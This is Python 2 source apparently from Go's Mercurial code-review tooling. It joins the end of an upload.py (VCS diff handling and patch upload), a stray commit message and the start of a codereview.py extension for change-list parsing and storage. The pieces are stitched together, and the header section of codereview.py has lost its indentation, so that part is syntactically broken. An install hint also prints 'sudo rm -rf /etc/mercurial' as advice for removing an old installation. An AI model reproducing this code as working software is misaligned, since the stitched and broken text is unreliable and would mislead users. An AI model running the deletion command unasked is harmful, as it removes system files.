            args += ["-r", "BASE"]
        cmd = ["svn"] + args + ["propget", "svn:mime-type", url]
        mimetype, returncode = RunShellWithReturnCode(cmd)
        if returncode:
            # File does not exist in the requested revision.
            # Reset mimetype, it contains an error message.
            mimetype = ""
        get_base = False
        is_binary = bool(mimetype) and not mimetype.startswith("text/")
        if status[0] == " ":
            # Empty base content just to force an upload.
            base_content = ""
        elif is_binary:
            if self.IsImage(filename):
                get_base = True
                if status[0] == "M":
                    if not self.rev_end:
                        new_content = self.ReadFile(filename)
                    else:
                        url = "%s/%s@%s" % (self.svn_base, filename, self.rev_end)
                        new_content = RunShell(["svn", "cat", url],
                                               universal_newlines=True, silent_ok=True)
            else:
                base_content = ""
        else:
            get_base = True

        if get_base:
            # Binary content must not have its newlines rewritten.
            if is_binary:
                universal_newlines = False
            else:
                universal_newlines = True
            if self.rev_start:
                # "svn cat -r REV delete_file.txt" doesn't work. cat requires
                # the full URL with "@REV" appended instead of using "-r" option.
                url = "%s/%s@%s" % (self.svn_base, filename, self.rev_start)
                base_content = RunShell(["svn", "cat", url],
                                        universal_newlines=universal_newlines,
                                        silent_ok=True)
            else:
                base_content = RunShell(["svn", "cat", filename],
                                        universal_newlines=universal_newlines,
                                        silent_ok=True)
            if not is_binary:
                args = []
                if self.rev_start:
                    url = "%s/%s@%s" % (self.svn_base, filename, self.rev_start)
                else:
                    url = filename
                    args += ["-r", "BASE"]
                cmd = ["svn"] + args + ["propget", "svn:keywords", url]
                keywords, returncode = RunShellWithReturnCode(cmd)
                if keywords and not returncode:
                    # Collapse expanded svn keywords ($Id$ etc.) so the base
                    # matches the pristine repository copy.
                    base_content = self._CollapseKeywords(base_content, keywords)
    else:
        StatusUpdate("svn status returned unexpected output: %s" % status)
        sys.exit(1)
    return base_content, new_content, is_binary, status[0:5]
class GitVCS(VersionControlSystem):
    """Implementation of the VersionControlSystem interface for Git."""

    def __init__(self, options):
        super(GitVCS, self).__init__(options)
        # Map of filename -> (hash before, hash after) of base file.
        # Hashes for "no such file" are represented as None.
        self.hashes = {}
        # Map of new filename -> old filename for renames.
        self.renames = {}

    def GenerateDiff(self, extra_args):
        """Return "git diff" output massaged into svn-style diff format."""
        # This is more complicated than svn's GenerateDiff because we must convert
        # the diff output to include an svn-style "Index:" line as well as record
        # the hashes of the files, so we can upload them along with our diff.

        # Special used by git to indicate "no such content".
        NULL_HASH = "0"*40

        extra_args = extra_args[:]
        if self.options.revision:
            extra_args = [self.options.revision] + extra_args
        # -M enables rename detection so renames survive the round trip.
        extra_args.append('-M')

        # --no-ext-diff is broken in some versions of Git, so try to work around
        # this by overriding the environment (but there is still a problem if the
        # git config key "diff.external" is used).
        env = os.environ.copy()
        if 'GIT_EXTERNAL_DIFF' in env: del env['GIT_EXTERNAL_DIFF']
        gitdiff = RunShell(["git", "diff", "--no-ext-diff", "--full-index"]
                           + extra_args, env=env)
        svndiff = []
        filecount = 0
        filename = None
        for line in gitdiff.splitlines():
            match = re.match(r"diff --git a/(.*) b/(.*)$", line)
            if match:
                filecount += 1
                # Intentionally use the "after" filename so we can show renames.
                filename = match.group(2)
                svndiff.append("Index: %s\n" % filename)
                if match.group(1) != match.group(2):
                    self.renames[match.group(2)] = match.group(1)
            else:
                # The "index" line in a git diff looks like this (long hashes elided):
                #   index 82c0d44..b2cee3f 100755
                # We want to save the left hash, as that identifies the base file.
                match = re.match(r"index (\w+)\.\.(\w+)", line)
                if match:
                    before, after = (match.group(1), match.group(2))
                    if before == NULL_HASH:
                        before = None
                    if after == NULL_HASH:
                        after = None
                    self.hashes[filename] = (before, after)
            # Every original diff line is preserved after the inserted Index lines.
            svndiff.append(line + "\n")
        if not filecount:
            ErrorExit("No valid patches found in output from git diff")
        return "".join(svndiff)

    def GetUnknownFiles(self):
        """Return files git does not track (and are not ignored)."""
        status = RunShell(["git", "ls-files", "--exclude-standard", "--others"],
                          silent_ok=True)
        return status.splitlines()

    def GetFileContent(self, file_hash, is_binary):
        """Returns the content of a file identified by its git hash."""
        data, retcode = RunShellWithReturnCode(["git", "show", file_hash],
                                               universal_newlines=not is_binary)
        if retcode:
            ErrorExit("Got error status from 'git show %s'" % file_hash)
        return data

    def GetBaseFile(self, filename):
        """Return (base_content, new_content, is_binary, status) for filename."""
        hash_before, hash_after = self.hashes.get(filename, (None,None))
        base_content = None
        new_content = None
        is_binary = self.IsBinary(filename)
        status = None

        if filename in self.renames:
            status = "A +"  # Match svn attribute name for renames.
            if filename not in self.hashes:
                # If a rename doesn't change the content, we never get a hash.
                base_content = RunShell(["git", "show", filename])
        elif not hash_before:
            status = "A"
            base_content = ""
        elif not hash_after:
            status = "D"
        else:
            status = "M"

        is_image = self.IsImage(filename)

        # Grab the before/after content if we need it.
        # We should include file contents if it's text or it's an image.
        if not is_binary or is_image:
            # Grab the base content if we don't have it already.
            if base_content is None and hash_before:
                base_content = self.GetFileContent(hash_before, is_binary)
            # Only include the "after" file if it's an image; otherwise it
            # it is reconstructed from the diff.
            if is_image and hash_after:
                new_content = self.GetFileContent(hash_after, is_binary)

        return (base_content, new_content, is_binary, status)
class MercurialVCS(VersionControlSystem):
    """Implementation of the VersionControlSystem interface for Mercurial."""

    def __init__(self, options, repo_dir):
        super(MercurialVCS, self).__init__(options)
        # Absolute path to repository (we can be in a subdir)
        self.repo_dir = os.path.normpath(repo_dir)
        # Compute the subdir
        cwd = os.path.normpath(os.getcwd())
        assert cwd.startswith(self.repo_dir)
        self.subdir = cwd[len(self.repo_dir):].lstrip(r"\/")
        if self.options.revision:
            self.base_rev = self.options.revision
        else:
            # Default to the working directory's parent revision id.
            self.base_rev = RunShell(["hg", "parent", "-q"]).split(':')[1].strip()

    def _GetRelPath(self, filename):
        """Get relative path of a file according to the current directory,
        given its logical path in the repo."""
        assert filename.startswith(self.subdir), (filename, self.subdir)
        return filename[len(self.subdir):].lstrip(r"\/")

    def GenerateDiff(self, extra_args):
        """Return "hg diff --git" output massaged into svn-style diff format."""
        # If no file specified, restrict to the current subdir
        extra_args = extra_args or ["."]
        cmd = ["hg", "diff", "--git", "-r", self.base_rev] + extra_args
        data = RunShell(cmd, silent_ok=True)
        svndiff = []
        filecount = 0
        for line in data.splitlines():
            m = re.match("diff --git a/(\S+) b/(\S+)", line)
            if m:
                # Modify line to make it look like as it comes from svn diff.
                # With this modification no changes on the server side are required
                # to make upload.py work with Mercurial repos.
                # NOTE: for proper handling of moved/copied files, we have to use
                # the second filename.
                filename = m.group(2)
                svndiff.append("Index: %s" % filename)
                svndiff.append("=" * 67)
                filecount += 1
                logging.info(line)
            else:
                svndiff.append(line)
        if not filecount:
            ErrorExit("No valid patches found in output from hg diff")
        return "\n".join(svndiff) + "\n"

    def GetUnknownFiles(self):
        """Return a list of files unknown to the VCS."""
        args = []
        status = RunShell(["hg", "status", "--rev", self.base_rev, "-u", "."],
                          silent_ok=True)
        unknown_files = []
        for line in status.splitlines():
            # Status lines look like "? filename".
            st, fn = line.split(" ", 1)
            if st == "?":
                unknown_files.append(fn)
        return unknown_files

    def GetBaseFile(self, filename):
        """Return (base_content, new_content, is_binary, status) for filename."""
        # "hg status" and "hg cat" both take a path relative to the current subdir
        # rather than to the repo root, but "hg diff" has given us the full path
        # to the repo root.
        base_content = ""
        new_content = None
        is_binary = False
        oldrelpath = relpath = self._GetRelPath(filename)
        # "hg status -C" returns two lines for moved/copied files, one otherwise
        out = RunShell(["hg", "status", "-C", "--rev", self.base_rev, relpath])
        out = out.splitlines()
        # HACK: strip error message about missing file/directory if it isn't in
        # the working copy
        if out[0].startswith('%s: ' % relpath):
            out = out[1:]
        if len(out) > 1:
            # Moved/copied => considered as modified, use old filename to
            # retrieve base contents
            oldrelpath = out[1].strip()
            status = "M"
        else:
            status, _ = out[0].split(' ', 1)
        # base_rev may be "local:remote"; only the local part is usable here.
        if ":" in self.base_rev:
            base_rev = self.base_rev.split(":", 1)[0]
        else:
            base_rev = self.base_rev
        if status != "A":
            base_content = RunShell(["hg", "cat", "-r", base_rev, oldrelpath],
                                    silent_ok=True)
            is_binary = "\0" in base_content  # Mercurial's heuristic
        if status != "R":
            new_content = open(relpath, "rb").read()
            is_binary = is_binary or "\0" in new_content
        if is_binary and base_content:
            # Fetch again without converting newlines
            base_content = RunShell(["hg", "cat", "-r", base_rev, oldrelpath],
                                    silent_ok=True, universal_newlines=False)
        # Text files are reconstructed from the diff server-side; only binary
        # images need the "after" content uploaded.
        if not is_binary or not self.IsImage(relpath):
            new_content = None
        return base_content, new_content, is_binary, status
# NOTE: The SplitPatch function is duplicated in engine.py, keep them in sync.
def SplitPatch(data):
    """Splits a patch into separate pieces for each file.

    Args:
      data: A string containing the output of svn diff.

    Returns:
      A list of 2-tuple (filename, text) where text is the svn diff output
      pertaining to filename.
    """
    patches = []
    current_name = None
    current_lines = []
    for line in data.splitlines(True):
        started_name = None
        if line.startswith('Index:'):
            started_name = line.split(':', 1)[1].strip()
        elif line.startswith('Property changes on:'):
            # When a file is modified, paths use '/' between directories, however
            # when a property is modified '\' is used on Windows. Make them the same
            # otherwise the file shows up twice.
            candidate = line.split(':', 1)[1].strip().replace('\\', '/')
            if candidate != current_name:
                # File has property changes but no modifications, create a new diff.
                started_name = candidate
        if started_name:
            if current_name and current_lines:
                patches.append((current_name, ''.join(current_lines)))
            current_name = started_name
            current_lines = [line]
        elif current_lines is not None:
            current_lines.append(line)
    if current_name and current_lines:
        patches.append((current_name, ''.join(current_lines)))
    return patches
def UploadSeparatePatches(issue, rpc_server, patchset, data, options):
    """Uploads a separate patch for each file in the diff output.

    Returns a list of [patch_key, filename] for each file.
    """
    patches = SplitPatch(data)
    rv = []
    for patch in patches:
        # The server rejects oversized patch bodies; warn and skip those.
        if len(patch[1]) > MAX_UPLOAD_SIZE:
            print ("Not uploading the patch for " + patch[0] +
                   " because the file is too large.")
            continue
        form_fields = [("filename", patch[0])]
        if not options.download_base:
            form_fields.append(("content_upload", "1"))
        files = [("data", "data.diff", patch[1])]
        ctype, body = EncodeMultipartFormData(form_fields, files)
        url = "/%d/upload_patch/%d" % (int(issue), int(patchset))
        print "Uploading patch for " + patch[0]
        response_body = rpc_server.Send(url, body, content_type=ctype)
        lines = response_body.splitlines()
        # On success the first line is "OK" and the second is the patch key.
        if not lines or lines[0] != "OK":
            StatusUpdate(" --> %s" % response_body)
            sys.exit(1)
        rv.append([lines[1], patch[0]])
    return rv
def GuessVCSName():
    """Helper to guess the version control system.

    This examines the current directory, guesses which VersionControlSystem
    we're using, and returns a string indicating which VCS is detected.

    Returns:
      A pair (vcs, output). vcs is a string indicating which VCS was detected
      and is one of VCS_GIT, VCS_MERCURIAL, VCS_SUBVERSION, or VCS_UNKNOWN.
      output is a string containing any interesting output from the vcs
      detection routine, or None if there is nothing interesting.
    """
    # Mercurial has a command to get the base directory of a repository
    # Try running it, but don't die if we don't have hg installed.
    # NOTE: we try Mercurial first as it can sit on top of an SVN working copy.
    try:
        out, returncode = RunShellWithReturnCode(["hg", "root"])
        if returncode == 0:
            return (VCS_MERCURIAL, out.strip())
    except OSError, (errno, message):
        if errno != 2:  # ENOENT -- they don't have hg installed.
            raise

    # Subversion has a .svn in all working directories.
    if os.path.isdir('.svn'):
        logging.info("Guessed VCS = Subversion")
        return (VCS_SUBVERSION, None)

    # Git has a command to test if you're in a git tree.
    # Try running it, but don't die if we don't have git installed.
    try:
        out, returncode = RunShellWithReturnCode(["git", "rev-parse",
                                                  "--is-inside-work-tree"])
        if returncode == 0:
            return (VCS_GIT, None)
    except OSError, (errno, message):
        if errno != 2:  # ENOENT -- they don't have git installed.
            raise

    return (VCS_UNKNOWN, None)
def GuessVCS(options):
    """Helper to guess the version control system.

    This verifies any user-specified VersionControlSystem (by command line
    or environment variable). If the user didn't specify one, this examines
    the current directory, guesses which VersionControlSystem we're using,
    and returns an instance of the appropriate class. Exit with an error
    if we can't figure it out.

    Returns:
      A VersionControlSystem instance. Exits if the VCS can't be guessed.
    """
    # Explicit choice: command line first, then the environment.
    requested = options.vcs or os.environ.get("CODEREVIEW_VCS")
    if requested:
        mapped = VCS_ABBREVIATIONS.get(requested.lower())
        if mapped is None:
            ErrorExit("Unknown version control system %r specified." % requested)
        vcs, extra_output = mapped, None
    else:
        vcs, extra_output = GuessVCSName()

    if vcs == VCS_MERCURIAL:
        if extra_output is None:
            extra_output = RunShell(["hg", "root"]).strip()
        return MercurialVCS(options, extra_output)
    if vcs == VCS_SUBVERSION:
        return SubversionVCS(options)
    if vcs == VCS_GIT:
        return GitVCS(options)

    ErrorExit(("Could not guess version control system. "
               "Are you in a working copy directory?"))
def RealMain(argv, data=None):
    """The real main function.

    Args:
      argv: Command line arguments.
      data: Diff contents. If None (default) the diff is generated by
        the VersionControlSystem implementation returned by GuessVCS().

    Returns:
      A 2-tuple (issue id, patchset id).
      The patchset id is None if the base files are not uploaded by this
      script (applies only to SVN checkouts).
    """
    logging.basicConfig(format=("%(asctime).19s %(levelname)s %(filename)s:"
                                "%(lineno)s %(message)s "))
    # Force the C locale so VCS tool output is parseable.
    os.environ['LC_ALL'] = 'C'
    options, args = parser.parse_args(argv[1:])
    global verbosity
    verbosity = options.verbose
    if verbosity >= 3:
        logging.getLogger().setLevel(logging.DEBUG)
    elif verbosity >= 2:
        logging.getLogger().setLevel(logging.INFO)
    vcs = GuessVCS(options)
    if isinstance(vcs, SubversionVCS):
        # base field is only allowed for Subversion.
        # Note: Fetching base files may become deprecated in future releases.
        base = vcs.GuessBase(options.download_base)
    else:
        base = None
    if not base and options.download_base:
        # NOTE(review): options.download_base is already truthy inside this
        # branch, so this assignment looks like a no-op -- confirm against
        # upstream upload.py whether False was intended here.
        options.download_base = True
        logging.info("Enabled upload of base file")
    if not options.assume_yes:
        vcs.CheckForUnknownFiles()
    if data is None:
        data = vcs.GenerateDiff(args)
    files = vcs.GetBaseFiles(data)
    if verbosity >= 1:
        print "Upload server:", options.server, "(change with -s/--server)"
    if options.issue:
        prompt = "Message describing this patch set: "
    else:
        prompt = "New issue subject: "
    message = options.message or raw_input(prompt).strip()
    if not message:
        ErrorExit("A non-empty message is required")
    rpc_server = GetRpcServer(options)
    form_fields = [("subject", message)]
    if base:
        form_fields.append(("base", base))
    if options.issue:
        form_fields.append(("issue", str(options.issue)))
    if options.email:
        form_fields.append(("user", options.email))
    if options.reviewers:
        # Basic sanity check: the domain part must contain exactly one dot.
        for reviewer in options.reviewers.split(','):
            if "@" in reviewer and not reviewer.split("@")[1].count(".") == 1:
                ErrorExit("Invalid email address: %s" % reviewer)
        form_fields.append(("reviewers", options.reviewers))
    if options.cc:
        for cc in options.cc.split(','):
            if "@" in cc and not cc.split("@")[1].count(".") == 1:
                ErrorExit("Invalid email address: %s" % cc)
        form_fields.append(("cc", options.cc))
    description = options.description
    if options.description_file:
        if options.description:
            ErrorExit("Can't specify description and description_file")
        file = open(options.description_file, 'r')
        description = file.read()
        file.close()
    if description:
        form_fields.append(("description", description))
    # Send a hash of all the base file so the server can determine if a copy
    # already exists in an earlier patchset.
    base_hashes = ""
    for file, info in files.iteritems():
        if not info[0] is None:
            checksum = md5(info[0]).hexdigest()
            if base_hashes:
                base_hashes += "|"
            base_hashes += checksum + ":" + file
    form_fields.append(("base_hashes", base_hashes))
    if options.private:
        if options.issue:
            print "Warning: Private flag ignored when updating an existing issue."
        else:
            form_fields.append(("private", "1"))
    # If we're uploading base files, don't send the email before the uploads, so
    # that it contains the file status.
    if options.send_mail and options.download_base:
        form_fields.append(("send_mail", "1"))
    if not options.download_base:
        form_fields.append(("content_upload", "1"))
    if len(data) > MAX_UPLOAD_SIZE:
        print "Patch is large, so uploading file patches separately."
        uploaded_diff_file = []
        form_fields.append(("separate_patches", "1"))
    else:
        uploaded_diff_file = [("data", "data.diff", data)]
    ctype, body = EncodeMultipartFormData(form_fields, uploaded_diff_file)
    response_body = rpc_server.Send("/upload", body, content_type=ctype)
    patchset = None
    if not options.download_base or not uploaded_diff_file:
        # Response format: message line, patchset id line, then one
        # "<patch key> <filename>" pair per file.
        lines = response_body.splitlines()
        if len(lines) >= 2:
            msg = lines[0]
            patchset = lines[1].strip()
            patches = [x.split(" ", 1) for x in lines[2:]]
        else:
            msg = response_body
    else:
        msg = response_body
    if not response_body.startswith("Issue created.") and \
       not response_body.startswith("Issue updated."):
        print >>sys.stderr, msg
        sys.exit(0)
    # The issue id is the last path component of the issue URL in msg.
    issue = msg[msg.rfind("/")+1:]
    if not uploaded_diff_file:
        result = UploadSeparatePatches(issue, rpc_server, patchset, data, options)
        if not options.download_base:
            patches = result
    if not options.download_base:
        vcs.UploadBaseFiles(issue, rpc_server, patches, patchset, options, files)
    if options.send_mail:
        rpc_server.Send("/" + issue + "/mail", payload="")
    return issue, patchset
def main():
    """Script entry point: run RealMain, converting Ctrl-C to a clean exit."""
    try:
        RealMain(sys.argv)
    except KeyboardInterrupt:
        print
        StatusUpdate("Interrupted.")
        sys.exit(1)
Pass ui into PostMessage to avoid nasty/confusing exception
R=rsc
http://codereview.appspot.com/155079
Committer: Russ Cox <5ad239cb8a44f659eaaee0aa1ea5b94947abe557@golang.org>
#!/usr/bin/env python
#
# Copyright 2007-2009 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''Mercurial interface to codereview.appspot.com.
To configure, set the following options in
your repository's .hg/hgrc file.
[extensions]
codereview = path/to/codereview.py
[codereview]
server = codereview.appspot.com
The server should be running Rietveld; see http://code.google.com/p/rietveld/.
In addition to the new commands, this extension introduces
the file pattern syntax @nnnnnn, where nnnnnn is a change list
number, to mean the files included in that change list, which
must be associated with the current client.
For example, if change 123456 contains the files x.go and y.go,
"hg diff @123456" is equivalent to "hg diff x.go y.go".
'''
from mercurial import cmdutil, commands, hg, util, error, match
from mercurial.node import nullrev, hex, nullid, short
import os, re
import stat
import subprocess
import threading
from HTMLParser import HTMLParser
from xml.etree import ElementTree as ET
try:
hgversion = util.version()
except:
from mercurial.version import version as v
hgversion = v.get_version()
oldMessage = """
The code review extension requires Mercurial 1.3 or newer.
To install a new Mercurial,
sudo easy_install mercurial
works on most systems.
"""
linuxMessage = """
You may need to clear your current Mercurial installation by running:
sudo apt-get remove mercurial mercurial-common
sudo rm -rf /etc/mercurial
"""
if hgversion < '1.3':
msg = oldMessage
if os.access("/etc/mercurial", 0):
msg += linuxMessage
raise util.Abort(msg)
# To experiment with Mercurial in the python interpreter:
# >>> repo = hg.repository(ui.ui(), path = ".")
#######################################################################
# Normally I would split this into multiple files, but it simplifies
# import path headaches to keep it all in one file. Sorry.
import sys
if __name__ == "__main__":
print >>sys.stderr, "This is a Mercurial extension and should not be invoked directly."
sys.exit(2)
#######################################################################
# Change list parsing.
#
# Change lists are stored in .hg/codereview/cl.nnnnnn
# where nnnnnn is the number assigned by the code review server.
# Most data about a change list is stored on the code review server
# too: the description, reviewer, and cc list are all stored there.
# The only thing in the cl.nnnnnn file is the list of relevant files.
# Also, the existence of the cl.nnnnnn file marks this repository
# as the one where the change list lives.
class CL(object):
    """In-memory representation of a change list (CL).

    A CL lives partly on disk (.hg/codereview/cl.<name> holds the file
    list) and partly on the code review server (description, reviewers,
    cc). The name "new" marks a CL not yet assigned a server number.
    """

    def __init__(self, name):
        self.name = name
        self.desc = ''          # description text
        self.files = []         # files claimed by this CL
        self.reviewer = []      # reviewer email addresses
        self.cc = []            # cc email addresses
        self.url = ''           # issue URL once known
        self.local = False      # True if a cl.<name> file exists on disk
        self.web = False        # True if the CL exists on the review server
        self.original_author = None  # None means current user

    def DiskText(self):
        """Serialized form written to .hg/codereview/cl.<name>."""
        cl = self
        s = ""
        if cl.original_author:
            s += "Author: " + cl.original_author + "\n\n"
        s += "Description:\n"
        s += Indent(cl.desc, "\t")
        s += "Files:\n"
        for f in cl.files:
            s += "\t" + f + "\n"
        return s

    def EditorText(self):
        """Text presented to the user's editor for interactive editing."""
        cl = self
        s = _change_prolog
        s += "\n"
        if cl.original_author:
            s += "Author: " + cl.original_author + "\n"
        if cl.url != '':
            s += 'URL: ' + cl.url + ' # cannot edit\n\n'
        s += "Reviewer: " + JoinComma(cl.reviewer) + "\n"
        s += "CC: " + JoinComma(cl.cc) + "\n"
        s += "\n"
        s += "Description:\n"
        if cl.desc == '':
            s += "\t<enter description here>\n"
        else:
            s += Indent(cl.desc, "\t")
        s += "\n"
        # The file list is only editable for local or brand-new CLs.
        if cl.local or cl.name == "new":
            s += "Files:\n"
            for f in cl.files:
                s += "\t" + f + "\n"
            s += "\n"
        return s

    def PendingText(self):
        """Human-readable summary used by the pending-CLs listing."""
        cl = self
        s = cl.name + ":" + "\n"
        s += Indent(cl.desc, "\t")
        s += "\n"
        if cl.original_author:
            s += "\tAuthor: " + cl.original_author + "\n"
        s += "\tReviewer: " + JoinComma(cl.reviewer) + "\n"
        s += "\tCC: " + JoinComma(cl.cc) + "\n"
        s += "\tFiles:\n"
        for f in cl.files:
            s += "\t\t" + f + "\n"
        return s

    def Flush(self, ui, repo):
        """Persist the CL to disk, syncing server metadata when needed."""
        if self.name == "new":
            self.Upload(ui, repo, gofmt_just_warn=True)
        dir = CodeReviewDir(ui, repo)
        path = dir + '/cl.' + self.name
        # Write to "path!" then rename so the update is atomic.
        f = open(path+'!', "w")
        f.write(self.DiskText())
        f.close()
        os.rename(path+'!', path)
        if self.web and not self.original_author:
            EditDesc(self.name, desc=self.desc,
                     reviewers=JoinComma(self.reviewer), cc=JoinComma(self.cc))

    def Delete(self, ui, repo):
        """Remove this CL's file from disk."""
        dir = CodeReviewDir(ui, repo)
        os.unlink(dir + "/cl." + self.name)

    def Subject(self):
        """Email subject: first description line, truncated, with CL tag."""
        s = line1(self.desc)
        if len(s) > 60:
            s = s[0:55] + "..."
        if self.name != "new":
            s = "code review %s: %s" % (self.name, s)
        return s

    def Upload(self, ui, repo, send_mail=False, gofmt=True, gofmt_just_warn=False):
        """Create or update this CL's issue on the code review server."""
        if ui.configbool("codereview", "force_gofmt", True) and gofmt:
            CheckGofmt(ui, repo, self.files, just_warn=gofmt_just_warn)
        os.chdir(repo.root)
        form_fields = [
            ("content_upload", "1"),
            ("reviewers", JoinComma(self.reviewer)),
            ("cc", JoinComma(self.cc)),
            ("description", self.desc),
            ("base_hashes", ""),
            # Would prefer not to change the subject
            # on reupload, but /upload requires it.
            ("subject", self.Subject()),
        ]

        # NOTE(rsc): This duplicates too much of RealMain,
        # but RealMain doesn't have the most reusable interface.
        if self.name != "new":
            form_fields.append(("issue", self.name))
        vcs = GuessVCS(upload_options)
        data = vcs.GenerateDiff(self.files)
        files = vcs.GetBaseFiles(data)
        if len(data) > MAX_UPLOAD_SIZE:
            uploaded_diff_file = []
            form_fields.append(("separate_patches", "1"))
        else:
            uploaded_diff_file = [("data", "data.diff", data)]
        ctype, body = EncodeMultipartFormData(form_fields, uploaded_diff_file)
        response_body = MySend("/upload", body, content_type=ctype)
        patchset = None
        msg = response_body
        lines = msg.splitlines()
        if len(lines) >= 2:
            msg = lines[0]
            patchset = lines[1].strip()
            patches = [x.split(" ", 1) for x in lines[2:]]
        ui.status(msg + "\n")
        if not response_body.startswith("Issue created.") and not response_body.startswith("Issue updated."):
            raise util.Abort("failed to update issue: " + response_body)
        # The issue id is the last path component of the URL in msg.
        issue = msg[msg.rfind("/")+1:]
        self.name = issue
        if not self.url:
            self.url = server_url_base + self.name
        if not uploaded_diff_file:
            patches = UploadSeparatePatches(issue, rpc, patchset, data, upload_options)
        vcs.UploadBaseFiles(issue, rpc, patches, patchset, upload_options, files)
        if send_mail:
            MySend("/" + issue + "/mail", payload="")
        self.web = True
        self.Flush(ui, repo)
        return
def GoodCLName(name):
    """Return a truthy match object iff name is a plain decimal number."""
    return re.match(r"^[0-9]+$", name)
def ParseCL(text, name):
    """Parse the editor/disk representation of a change list.

    Args:
      text: sectioned CL text ("Author:", "Description:", "Files:", ...).
      name: the CL name/number to attach to the result.

    Returns:
      (cl, 0, '') on success, or (None, lineno, errmsg) on a parse error.
    """
    sname = None  # name of the section currently being accumulated
    lineno = 0
    sections = {
        'Author': '',
        'Description': '',
        'Files': '',
        'URL': '',
        'Reviewer': '',
        'CC': '',
    }
    for line in text.split('\n'):
        lineno += 1
        line = line.rstrip()
        if line != '' and line[0] == '#':
            # Comment lines are ignored entirely.
            continue
        if line == '' or line[0] == ' ' or line[0] == '\t':
            # Blank or indented lines continue the current section.
            if sname is None and line != '':
                return None, lineno, 'text outside section'
            if sname is not None:
                sections[sname] += line + '\n'
            continue
        p = line.find(':')
        if p >= 0:
            s, val = line[:p].strip(), line[p+1:].strip()
            if s in sections:
                sname = s
                if val != '':
                    sections[sname] += val + '\n'
                continue
        return None, lineno, 'malformed section header'

    for k in sections:
        sections[k] = StripCommon(sections[k]).rstrip()

    cl = CL(name)
    if sections['Author']:
        cl.original_author = sections['Author']
    cl.desc = sections['Description']
    for line in sections['Files'].split('\n'):
        # Strip trailing "# ..." comments from file entries.
        i = line.find('#')
        if i >= 0:
            line = line[0:i].rstrip()
        if line == '':
            continue
        cl.files.append(line)
    cl.reviewer = SplitCommaSpace(sections['Reviewer'])
    cl.cc = SplitCommaSpace(sections['CC'])
    cl.url = sections['URL']
    if cl.desc == '<enter description here>':
        # The editor placeholder counts as no description at all.
        cl.desc = ''
    return cl, 0, ''
def SplitCommaSpace(s):
    """Split s on commas and/or whitespace, discarding empty pieces."""
    return [word for word in re.split(r"[,\s]+", s) if word]
def CutDomain(s):
    """Strip the "@domain" suffix from an email address, if present."""
    return s.partition('@')[0]
def JoinComma(l):
    """Render a list of strings as a single comma-separated string."""
    separator = ", "
    return separator.join(l)
def ExceptionDetail():
    """Describe the in-flight exception as "TypeName: message"."""
    name = str(sys.exc_info()[0])
    # str() of an exception type looks like "<type 'X'>" or "<class 'X'>";
    # keep just the bare type name.
    for prefix, suffix in (("<type '", "'>"), ("<class '", "'>")):
        if name.startswith(prefix) and name.endswith(suffix):
            name = name[len(prefix):-len(suffix)]
            break
    detail = str(sys.exc_info()[1])
    if len(detail) > 0:
        name += ": " + detail
    return name
def IsLocalCL(ui, repo, name):
    """Truthy iff name is a valid CL number with a cl.<name> file on disk."""
    match = GoodCLName(name)
    if not match:
        return match
    return os.access(CodeReviewDir(ui, repo) + "/cl." + name, 0)
# Load CL from disk and/or the web.
def LoadCL(ui, repo, name, web=True):
    """Load CL `name`, from disk if present, optionally refreshed from the server.

    Returns (cl, '') on success or (None, errmsg) on failure.
    """
    if not GoodCLName(name):
        return None, "invalid CL name"
    dir = CodeReviewDir(ui, repo)
    path = dir + "cl." + name
    if os.access(path, 0):
        ff = open(path)
        text = ff.read()
        ff.close()
        cl, lineno, err = ParseCL(text, name)
        if err != "":
            return None, "malformed CL data: "+err
        cl.local = True
    else:
        cl = CL(name)
    if web:
        # Best-effort fetch of server-side metadata; any failure is reported
        # rather than raised.
        try:
            f = GetSettings(name)
        except:
            return None, "cannot load CL %s from code review server: %s" % (name, ExceptionDetail())
        if 'reviewers' not in f:
            return None, "malformed response loading CL data from code review server"
        cl.reviewer = SplitCommaSpace(f['reviewers'])
        cl.cc = SplitCommaSpace(f['cc'])
        cl.desc = f['description']
        cl.url = server_url_base + name
        cl.web = True
    return cl, ''
class LoadCLThread(threading.Thread):
    """Worker thread that loads one CL (possibly contacting the server)."""

    def __init__(self, ui, repo, dir, f, web):
        threading.Thread.__init__(self)
        self.ui = ui
        self.repo = repo
        self.dir = dir
        self.f = f        # filename of the form "cl.<number>"
        self.web = web    # whether to refresh metadata from the server
        self.cl = None    # result; stays None if loading failed

    def run(self):
        # f[3:] strips the "cl." prefix to obtain the CL number.
        cl, err = LoadCL(self.ui, self.repo, self.f[3:], web=self.web)
        if err != '':
            self.ui.warn("loading "+self.dir+self.f+": " + err + "\n")
            return
        self.cl = cl
# Load all the CLs from this repository.
def LoadAllCL(ui, repo, web=True):
    """Return a dict mapping CL name -> CL for every cl.* file on disk."""
    dir = CodeReviewDir(ui, repo)
    m = {}
    files = [f for f in os.listdir(dir) if f.startswith('cl.')]
    if not files:
        return m
    active = []
    first = True
    for f in files:
        t = LoadCLThread(ui, repo, dir, f, web)
        t.start()
        if web and first:
            # first request: wait in case it needs to authenticate
            # otherwise we get lots of user/password prompts
            # running in parallel.
            t.join()
            if t.cl:
                m[t.cl.name] = t.cl
            first = False
        else:
            active.append(t)
    # Collect results from the remaining parallel loads.
    for t in active:
        t.join()
        if t.cl:
            m[t.cl.name] = t.cl
    return m
# Find repository root. On error, ui.warn and return None
def RepoDir(ui, repo):
    """Return the repository root as a local filesystem path, or None.

    Warns via ui and returns None when the repo is not file:-backed.
    """
    url = repo.url()
    if not url.startswith('file:/'):
        ui.warn("repository %s is not in local file system\n" % (url,))
        return None
    # Drop the "file:" scheme and any trailing slash.
    url = url[len('file:'):]
    return url[:-1] if url.endswith('/') else url
# Find (or make) code review directory. On error, ui.warn and return None
def CodeReviewDir(ui, repo):
    """Return the path of the .hg/codereview/ directory, creating it if needed.

    Returns the directory path with a trailing '/', or None (after a
    ui.warn) when the repo root is unknown or the mkdir fails.
    """
    dir = RepoDir(ui, repo)
    if dir is None:
        return None
    dir += '/.hg/codereview/'
    if not os.path.isdir(dir):
        try:
            # 0o700 (was the Python-2-only literal 0700): CL state may hold
            # draft descriptions, so keep it private to the user.
            os.mkdir(dir, 0o700)
        except OSError:
            ui.warn('cannot mkdir %s: %s\n' % (dir, ExceptionDetail()))
            return None
    return dir
